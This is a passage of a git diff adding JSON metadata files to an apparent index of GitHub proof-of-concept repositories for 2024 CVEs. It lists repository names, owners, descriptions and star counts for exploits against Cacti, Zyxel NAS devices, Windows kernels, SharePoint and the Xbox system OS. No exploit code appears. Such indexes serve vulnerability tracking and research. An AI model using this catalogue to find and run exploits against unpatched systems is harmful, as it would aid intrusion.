"https:\/\/avatars.githubusercontent.com\/u\/88578649?v=4", + "html_url": "https:\/\/github.com\/DEVisions", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DEVisions\/CVE-2024-29868", + "description": "Proof of concept of CVE-2024-29868 affecting Apache StreamPipes from 0.69.0 through 0.93.0", + "fork": false, + "created_at": "2024-06-24T14:53:05Z", + "updated_at": "2024-12-04T07:30:12Z", + "pushed_at": "2024-06-24T15:28:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29895.json b/2024/CVE-2024-29895.json new file mode 100644 index 0000000000..d090a3603b --- /dev/null +++ b/2024/CVE-2024-29895.json @@ -0,0 +1,135 @@ +[ + { + "id": 801030972, + "name": "CVE-2024-29895-CactiRCE-PoC", + "full_name": "Stuub\/CVE-2024-29895-CactiRCE-PoC", + "owner": { + "login": "Stuub", + "id": 60468836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4", + "html_url": "https:\/\/github.com\/Stuub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-29895-CactiRCE-PoC", + "description": "CVE-2024-29895 PoC - Exploiting remote command execution in Cacti servers using the 1.3.X DEV branch builds", + "fork": false, + "created_at": "2024-05-15T13:11:45Z", + "updated_at": "2024-10-21T13:17:56Z", + "pushed_at": "2024-05-15T21:40:25Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cacti", + "cactirce", + "cve-2024", + "cve-2024-29895", + "owasp", + "php", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801392594, + "name": "CVE-2024-29895", + "full_name": "secunnix\/CVE-2024-29895", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-29895", + "description": "Cacti CVE-2024-29895 POC", + "fork": false, + "created_at": "2024-05-16T06:29:21Z", + "updated_at": "2024-05-16T19:17:05Z", + "pushed_at": "2024-05-16T15:29:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 801731520, + "name": "CVE-2024-29895.py", + "full_name": "ticofookfook\/CVE-2024-29895.py", + "owner": { + "login": "ticofookfook", + "id": 99700348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4", + "html_url": "https:\/\/github.com\/ticofookfook", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2024-29895.py", + "description": null, + "fork": false, + "created_at": "2024-05-16T20:03:03Z", + "updated_at": "2024-05-16T20:05:37Z", + "pushed_at": "2024-05-16T20:05:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802277498, + "name": "CVE-2024-29895", + "full_name": "Rubioo02\/CVE-2024-29895", + "owner": { + "login": "Rubioo02", + "id": 153825296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4", + "html_url": "https:\/\/github.com\/Rubioo02", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2024-29895", + "description": "CVE-2024-29895 | RCE on CACTI 1.3.X dev", + "fork": false, + "created_at": "2024-05-17T22:03:29Z", + "updated_at": "2024-06-10T01:45:38Z", + "pushed_at": "2024-05-18T12:49:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29943.json b/2024/CVE-2024-29943.json new file mode 100644 index 0000000000..739768a571 --- /dev/null +++ b/2024/CVE-2024-29943.json @@ -0,0 +1,33 @@ +[ + { + "id": 820945819, + "name": "CVE-2024-29943", + "full_name": "bjrjk\/CVE-2024-29943", + "owner": { + "login": "bjrjk", + "id": 6657270, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6657270?v=4", + "html_url": "https:\/\/github.com\/bjrjk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bjrjk\/CVE-2024-29943", + "description": "A Pwn2Own 2024 SpiderMonkey JIT Bug: From Integer Range Inconsistency to Bound Check Elimination then RCE", + "fork": false, + "created_at": "2024-06-27T13:47:52Z", + "updated_at": "2024-12-16T06:25:48Z", + "pushed_at": "2024-07-07T03:36:49Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 88, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-2997.json b/2024/CVE-2024-2997.json new file mode 100644 index 0000000000..e032e0e73b --- /dev/null +++ b/2024/CVE-2024-2997.json @@ -0,0 +1,33 @@ +[ + { + "id": 837629767, + "name": "CVE-2024-2997", + "full_name": "lfillaz\/CVE-2024-2997", + "owner": { + "login": "lfillaz", + "id": 114345508, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114345508?v=4", + "html_url": "https:\/\/github.com\/lfillaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lfillaz\/CVE-2024-2997", + "description": "The tool helps in quickly identifying vulnerabilities by examining a comprehensive list of potential paths on a website, making it useful for security assessments.", + "fork": false, + "created_at": "2024-08-03T14:40:08Z", + "updated_at": "2024-11-20T16:30:59Z", + "pushed_at": "2024-09-24T00:27:08Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29972.json b/2024/CVE-2024-29972.json new file mode 100644 index 0000000000..70232ba380 --- /dev/null +++ b/2024/CVE-2024-29972.json @@ -0,0 +1,64 @@ +[ + { + "id": 817750758, + "name": "CVE-2024-29972", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-29972", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-29972", + "description": null, + "fork": false, + "created_at": "2024-06-20T11:12:52Z", + "updated_at": "2024-08-05T12:05:43Z", + "pushed_at": "2024-06-20T11:21:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 822251439, + "name": "CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "full_name": "Pommaq\/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "owner": { + "login": "Pommaq", + "id": 42520348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42520348?v=4", + "html_url": "https:\/\/github.com\/Pommaq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pommaq\/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc", + "description": "This is a proof of concept for the Zyxel vulnerabilities I found. Read the blog :)", + "fork": false, + "created_at": "2024-06-30T17:54:02Z", + "updated_at": "2024-08-20T10:47:07Z", + "pushed_at": "2024-06-30T17:54:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29973.json b/2024/CVE-2024-29973.json new file mode 100644 index 0000000000..67685c5f16 --- /dev/null +++ b/2024/CVE-2024-29973.json @@ -0,0 +1,188 @@ +[ + { + "id": 817231068, + "name": "CVE-2024-29973", + "full_name": "momika233\/CVE-2024-29973", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-06-19T09:28:46Z", + "updated_at": "2024-06-20T04:21:51Z", + "pushed_at": "2024-06-19T09:29:02Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817257622, + "name": "CVE-2024-29973", + "full_name": "bigb0x\/CVE-2024-29973", + "owner": { + "login": "bigb0x", + "id": 13532434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4", + "html_url": "https:\/\/github.com\/bigb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-29973", + "description": "POC for CVE-2024-29973", + "fork": false, + "created_at": "2024-06-19T10:34:56Z", + "updated_at": "2024-09-23T06:25:00Z", + "pushed_at": "2024-07-06T00:17:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 817562128, + "name": "CVE-2024-29973", + "full_name": "k3lpi3b4nsh33\/CVE-2024-29973", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-06-20T01:52:35Z", + "updated_at": "2024-12-26T19:24:25Z", + "pushed_at": "2024-06-20T02:27:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818123344, + "name": "CVE-2024-29973", + "full_name": "p0et08\/CVE-2024-29973", + "owner": { + "login": "p0et08", + "id": 173439951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173439951?v=4", + "html_url": "https:\/\/github.com\/p0et08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0et08\/CVE-2024-29973", + "description": "PoC and Bulk Scanner for CVE-2024-29973", + "fork": false, + "created_at": "2024-06-21T06:38:50Z", + "updated_at": "2024-06-21T07:00:51Z", + "pushed_at": "2024-06-21T07:00:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 818318428, + "name": "CVE-2024-29973", + "full_name": "RevoltSecurities\/CVE-2024-29973", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-29973", + "description": "Exploiter a Vulnerability detection and Exploitation tool for CVE-2024-29973 with Asychronous Performance.", + "fork": false, + "created_at": "2024-06-21T15:20:52Z", + "updated_at": "2024-11-20T16:30:51Z", + "pushed_at": "2024-06-21T15:33:09Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 870929719, + "name": "CVE-2024-29973", + "full_name": "skyrowalker\/CVE-2024-29973", + "owner": { + "login": "skyrowalker", + "id": 156471538, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156471538?v=4", + "html_url": "https:\/\/github.com\/skyrowalker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skyrowalker\/CVE-2024-29973", + "description": null, + "fork": false, + "created_at": "2024-10-10T23:48:55Z", + "updated_at": "2024-10-11T20:10:47Z", + "pushed_at": "2024-10-11T20:10:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-29988.json b/2024/CVE-2024-29988.json new file mode 100644 index 0000000000..f3ecc622e2 --- /dev/null +++ b/2024/CVE-2024-29988.json @@ -0,0 +1,33 @@ +[ + { + "id": 795499188, + "name": "CVE-2024-29988-exploit", + "full_name": "Sploitus\/CVE-2024-29988-exploit", + "owner": { + "login": "Sploitus", + "id": 168830967, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168830967?v=4", + "html_url": "https:\/\/github.com\/Sploitus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sploitus\/CVE-2024-29988-exploit", + "description": "Exploit for Microsoft SmartScreen malicious execution (april 2024)", + "fork": false, + "created_at": "2024-05-03T12:17:25Z", + "updated_at": "2024-10-24T13:10:29Z", + "pushed_at": "2024-05-03T12:57:49Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30043.json b/2024/CVE-2024-30043.json new file mode 100644 index 0000000000..05a2793bec --- /dev/null +++ b/2024/CVE-2024-30043.json @@ -0,0 +1,33 @@ +[ + { + "id": 811511540, + "name": "CVE-2024-30043-XXE", + "full_name": "W01fh4cker\/CVE-2024-30043-XXE", + "owner": { + "login": "W01fh4cker", + "id": 101872898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4", + "html_url": "https:\/\/github.com\/W01fh4cker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-30043-XXE", + "description": "Exploiting XXE Vulnerabilities on Microsoft SharePoint Server and Cloud via Confused URL Parsing", + "fork": false, + "created_at": "2024-06-06T18:31:57Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-06T18:38:06Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30051.json b/2024/CVE-2024-30051.json new file mode 100644 index 0000000000..84b5e6f466 --- /dev/null +++ b/2024/CVE-2024-30051.json @@ -0,0 +1,33 @@ +[ + { + "id": 842575899, + "name": "CVE-2024-30051", + "full_name": "fortra\/CVE-2024-30051", + "owner": { + "login": "fortra", + "id": 117669217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117669217?v=4", + "html_url": "https:\/\/github.com\/fortra", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fortra\/CVE-2024-30051", + "description": null, + "fork": false, + "created_at": "2024-08-14T16:20:38Z", + "updated_at": "2025-01-02T19:52:35Z", + "pushed_at": "2024-09-05T23:21:00Z", + "stargazers_count": 113, + "watchers_count": 113, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 113, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30052.json b/2024/CVE-2024-30052.json new file mode 100644 index 0000000000..e525e73612 --- /dev/null +++ b/2024/CVE-2024-30052.json @@ -0,0 +1,33 @@ +[ + { + "id": 867811373, + "name": "CVE-2024-30052", + "full_name": "ynwarcs\/CVE-2024-30052", + "owner": { + "login": "ynwarcs", + "id": 108408574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108408574?v=4", + "html_url": "https:\/\/github.com\/ynwarcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynwarcs\/CVE-2024-30052", + "description": "Materials for CVE-2024-30052.", + "fork": false, + "created_at": "2024-10-04T19:09:45Z", + "updated_at": "2024-12-21T05:56:21Z", + "pushed_at": "2024-10-04T20:28:39Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30056.json b/2024/CVE-2024-30056.json new file mode 100644 index 0000000000..f356b17e8a --- /dev/null +++ b/2024/CVE-2024-30056.json @@ -0,0 +1,33 @@ +[ + { + "id": 806410467, + "name": "Microsoft-Edge-Information-Disclosure", + "full_name": "absholi7ly\/Microsoft-Edge-Information-Disclosure", + "owner": { + "login": "absholi7ly", + "id": 72062217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4", + "html_url": "https:\/\/github.com\/absholi7ly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/absholi7ly\/Microsoft-Edge-Information-Disclosure", + "description": "CVE-2024-30056 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability", + "fork": false, + "created_at": "2024-05-27T06:37:34Z", + "updated_at": "2024-07-03T13:32:39Z", + "pushed_at": "2024-05-27T06:47:27Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30085.json b/2024/CVE-2024-30085.json new file mode 100644 index 0000000000..ce10399176 --- /dev/null +++ b/2024/CVE-2024-30085.json @@ -0,0 +1,64 @@ +[ + { + "id": 908098736, + "name": "CVE-2024-30085", + "full_name": "Adamkadaban\/CVE-2024-30085", + "owner": { + "login": "Adamkadaban", + "id": 34610663, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34610663?v=4", + "html_url": "https:\/\/github.com\/Adamkadaban", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Adamkadaban\/CVE-2024-30085", + "description": "CVE-2024-30085", + "fork": false, + "created_at": "2024-12-25T06:03:45Z", + "updated_at": "2024-12-27T16:22:22Z", + "pushed_at": "2024-12-27T02:08:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 909306710, + "name": "Exploit-PoC-para-CVE-2024-30085", + "full_name": "murdok1982\/Exploit-PoC-para-CVE-2024-30085", + "owner": { + "login": "murdok1982", + "id": 14059710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14059710?v=4", + "html_url": "https:\/\/github.com\/murdok1982", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murdok1982\/Exploit-PoC-para-CVE-2024-30085", + "description": " Exploit en Python diseñado para aprovechar la vulnerabilidad de elevación de privilegios CVE-2024-30085", + "fork": false, + "created_at": "2024-12-28T10:03:26Z", + "updated_at": "2024-12-28T10:12:41Z", + "pushed_at": "2024-12-28T10:12:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30088.json b/2024/CVE-2024-30088.json new file mode 100644 index 0000000000..a7405df5e0 --- /dev/null +++ b/2024/CVE-2024-30088.json @@ -0,0 +1,188 @@ +[ + { + "id": 819353425, + "name": "CVE-2024-30088", + "full_name": "tykawaii98\/CVE-2024-30088", + "owner": { + "login": "tykawaii98", + "id": 45362197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4", + "html_url": "https:\/\/github.com\/tykawaii98", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-30088", + "description": null, + "fork": false, + "created_at": "2024-06-24T10:37:26Z", + "updated_at": "2025-01-05T12:50:13Z", + "pushed_at": "2024-07-31T19:11:55Z", + "stargazers_count": 246, + "watchers_count": 246, + "has_discussions": false, + "forks_count": 54, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 54, + "watchers": 246, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 820782545, + "name": "CVE-2024-30088-", + "full_name": "NextGenPentesters\/CVE-2024-30088-", + "owner": { + "login": "NextGenPentesters", + "id": 169174200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169174200?v=4", + "html_url": "https:\/\/github.com\/NextGenPentesters", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NextGenPentesters\/CVE-2024-30088-", + "description": "🆘New Windows Kernel Priviledge Escalation Vulnerability", + "fork": false, + "created_at": "2024-06-27T07:05:46Z", + "updated_at": "2024-11-02T10:05:52Z", + "pushed_at": "2024-06-27T07:19:11Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824657284, + "name": "CVE-2024-30088-Windows-poc", + "full_name": "Zombie-Kaiser\/CVE-2024-30088-Windows-poc", + "owner": { + "login": "Zombie-Kaiser", + "id": 141570642, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141570642?v=4", + "html_url": "https:\/\/github.com\/Zombie-Kaiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Zombie-Kaiser\/CVE-2024-30088-Windows-poc", + "description": "该漏洞存在于 NtQueryInformationToken 函数中,特别是在处理AuthzBasepCopyoutInternalSecurityAttributes 函数时,该漏洞源于内核在操作对象时对锁定机制的不当管理,这一失误可能导致恶意实体意外提升权限。", + "fork": false, + "created_at": "2024-07-05T16:02:56Z", + "updated_at": "2024-11-27T08:32:37Z", + "pushed_at": "2024-07-05T16:06:16Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 828831210, + "name": "collateral-damage", + "full_name": "exploits-forsale\/collateral-damage", + "owner": { + "login": "exploits-forsale", + "id": 168065072, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168065072?v=4", + "html_url": "https:\/\/github.com\/exploits-forsale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/exploits-forsale\/collateral-damage", + "description": "Kernel exploit for Xbox SystemOS using CVE-2024-30088", + "fork": false, + "created_at": "2024-07-15T08:07:05Z", + "updated_at": "2024-12-29T10:34:41Z", + "pushed_at": "2024-09-08T21:23:34Z", + "stargazers_count": 433, + "watchers_count": 433, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 433, + "score": 0, + "subscribers_count": 21 + }, + { + "id": 834461917, + "name": "CVE-2024-30088", + "full_name": "Admin9961\/CVE-2024-30088", + "owner": { + "login": "Admin9961", + "id": 121270287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121270287?v=4", + "html_url": "https:\/\/github.com\/Admin9961", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Admin9961\/CVE-2024-30088", + "description": "Questa repository contiene una replica (tentativo di replica) scritto in Python per CVE-2024-30088.", + "fork": false, + "created_at": "2024-07-27T10:41:33Z", + "updated_at": "2024-08-20T19:17:32Z", + "pushed_at": "2024-07-27T16:30:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 847302794, + "name": "exploits-forsale-collateral-damage", + "full_name": "Justintroup85\/exploits-forsale-collateral-damage", + "owner": { + "login": "Justintroup85", + "id": 179375703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179375703?v=4", + "html_url": "https:\/\/github.com\/Justintroup85", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Justintroup85\/exploits-forsale-collateral-damage", + "description": "Kernel exploit for Xbox SystemOS using CVE-2024-30088", + "fork": false, + "created_at": "2024-08-25T12:47:10Z", + "updated_at": "2024-08-25T17:03:51Z", + "pushed_at": "2024-08-25T16:48:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": true, + "web_commit_signoff_required": true, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30090.json b/2024/CVE-2024-30090.json new file mode 100644 index 0000000000..234d66904c --- /dev/null +++ b/2024/CVE-2024-30090.json @@ -0,0 +1,33 @@ +[ + { + "id": 874092793, + "name": "CVE-2024-30090", + "full_name": "Dor00tkit\/CVE-2024-30090", + "owner": { + "login": "Dor00tkit", + "id": 47893732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47893732?v=4", + "html_url": "https:\/\/github.com\/Dor00tkit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dor00tkit\/CVE-2024-30090", + "description": "CVE-2024-30090 - LPE PoC", + "fork": false, + "created_at": "2024-10-17T08:38:47Z", + "updated_at": "2024-12-29T15:35:38Z", + "pushed_at": "2024-10-17T09:53:33Z", + "stargazers_count": 103, + "watchers_count": 103, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 103, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30212.json b/2024/CVE-2024-30212.json new file mode 100644 index 0000000000..9c2fed251b --- /dev/null +++ b/2024/CVE-2024-30212.json @@ -0,0 +1,33 @@ +[ + { + "id": 813535717, + "name": "blackleak", + "full_name": "Fehr-GmbH\/blackleak", + "owner": { + "login": "Fehr-GmbH", + "id": 94897660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94897660?v=4", + "html_url": "https:\/\/github.com\/Fehr-GmbH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fehr-GmbH\/blackleak", + "description": "CVE-2024-30212", + "fork": false, + "created_at": "2024-06-11T09:13:16Z", + "updated_at": "2024-06-16T15:28:02Z", + "pushed_at": "2024-06-11T09:54:26Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-30255.json b/2024/CVE-2024-30255.json new file mode 100644 index 0000000000..3eae4bf7db --- /dev/null +++ b/2024/CVE-2024-30255.json @@ -0,0 +1,33 @@ +[ + { + "id": 784316858, + "name": "Envoy-CPU-Exhaustion-Vulnerability-PoC", + "full_name": "blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC", 